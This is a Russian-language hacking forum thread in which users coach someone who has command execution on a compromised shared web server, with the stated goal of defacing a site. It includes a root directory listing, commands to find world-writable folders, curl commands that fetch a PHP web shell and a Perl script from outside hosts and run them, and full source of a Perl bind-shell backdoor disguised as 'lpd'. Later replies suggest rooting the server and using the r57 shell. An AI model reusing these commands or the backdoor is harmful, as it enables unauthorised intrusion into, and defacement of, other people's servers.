А вот результат выполнения ls -la /../ Code: total 1644 drwxr-xr-x 25 root root 1024 Aug 19 01:28 . drwxr-xr-x 25 root root 1024 Aug 19 01:28 .. -rw-r--r-- 1 root root 0 Aug 17 08:36 .autofsck -rw------- 1 root root 1164 Mar 17 2006 .bash_history drwxr-xr-x 3 root root 1024 Dec 17 2004 .cpan -rw------- 1 root root 0 Apr 11 2005 .mysql_history -rw------- 1 root root 1024 May 20 2006 .rnd drwx------ 2 root root 1024 Mar 31 08:10 .screen drwx------ 2 root root 1024 Dec 17 2004 .spamassassin -rw------- 1 root root 1043 Aug 2 15:22 .viminfo lrwxr-xr-x 1 root root 39 Aug 17 08:36 aquota.group -> /proc/vz/vzaquota/0000000f/aquota.group lrwxr-xr-x 1 root root 38 Aug 17 08:36 aquota.user -> /proc/vz/vzaquota/0000000f/aquota.user drwxr-xr-x 2 root root 1024 Dec 17 2004 backup drwxr-xr-x 2 root root 2048 Dec 16 2006 bin drwxr-xr-x 2 root root 1024 Dec 17 2004 boot drwxr-xr-x 5 root root 9216 Aug 17 08:37 dev -rw-r--r-- 1 root root 396094 Aug 17 14:40 error_log drwxr-xr-x 48 root root 5120 Aug 19 09:00 etc drwx--x--x 199 root root 5120 Aug 19 01:30 home drwx--x--x 71 root root 4096 Aug 8 14:10 home2 drwxr-xr-x 2 root root 1024 Oct 7 2003 initrd drwxr-xr-x 8 root root 3072 Dec 16 2006 lib drwx------ 2 root root 6144 Oct 15 2005 mbox_backup drwxr-xr-x 2 root root 1024 Oct 7 2003 mnt drwxr-xr-x 3 root root 1024 May 15 2006 opt drwxrwxrwx 12 root root 755712 Jul 13 12:20 php-cache dr-xr-xr-x 429 root root 0 Aug 17 08:36 proc -rw-r--r-- 1 root root 5206 Jan 30 2007 ps.out drwxr-x--- 20 root root 2048 Aug 19 01:24 root drwxr-xr-x 3 root root 2048 Dec 19 2005 sbin drwxr-xr-x 5 root root 13312 Aug 19 01:25 scripts -rw------- 1 root root 1024 Nov 29 2004 stunnel.rnd drwxrwxrwt 14 root root 442368 Aug 19 09:00 tmp drwxr-xr-x 17 root root 1024 Dec 17 2004 usr drwxr-xr-x 19 root root 1024 Aug 17 08:37 var
Попробуй создать папка. mkdir name_papla. Потом поставь права 777. chmod 777 name_papka Потом проверь сущевствуют ли вощ качалки. С помощью команды which. Пример:which wget Если покажет путь до wget'a то значит он сущевствует. А если не чего не появится, значит качалки не сущевствует.
Спасибо, ненадо Уже нашёл про curl и изучаю. Просто на том сайте, что вы мне дали - нет этого материала... Насколько я понял, curl закачивает по ftp?
curl --output /ПУТЬ_ДО_ЗАКАЧИВАЕМОГО_ФАЙЛА/SHELL.PHP http://XOST.COM/SHELL.TXT ПРОВЕРЬ КОМАНДОЙ find . -type d -perm -2 -ls В КАКИЕ ПАПКИ МОЖНО ПИСАТЬ. Я бы на твоем месте сделал так. Создал бы перловый сценарий вида system("cd /home;find . -type d -perm -2 -ls!!!!!!!!!!!
или просто залей back.pl в tmp и выполни. Сценарий system("cd /tmp;curl --output /tmp/b.pl http://narod.ru/b.pl";perl b.pl); CODE b.pl: Code: #!/usr/bin/perl use Socket; $port = 60000; $proto = getprotobyname('tcp'); $cmd = "lpd"; $system = 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh'; $0 = $cmd; socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!"; setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!"; bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!"; listen(SERVER, SOMAXCONN) or die "listen: $!"; for(; $paddr = accept(CLIENT, SERVER); close CLIENT) { open(STDIN, ">&CLIENT"); open(STDOUT, ">&CLIENT"); open(STDERR, ">&CLIENT"); system($system); close(STDIN); close(STDOUT); close(STDERR); }
Чего вы все так паритесь? Разве после слов не видно, что у ТС тупо не хватает прав на запись в диру, а значит он точно не правах пользователя user, что значит, что изменить файл index.php ему не удасться никак (вопрос был как задефейсить сайт). Выход один - рутать сервак, а ето для ТС видимо еще рановато...
команда для листинга верхнего каталога ../ , и не надо ля-ля) ls /../ можно заменить на ls / - этой командой ты выполняешь листинг корня =\ find / -type d -perm -2 -ls или если ты хочешь найти папки на запись именно в каталоге /home, то выполняй find /home -type d -perm -2 -ls и не надо ставить cd /home =\\\
Да это чувак , который вопрос задал молодой еще и не заинклудил как надо(для таких r57 самое то). Я ему заинклудил уже.
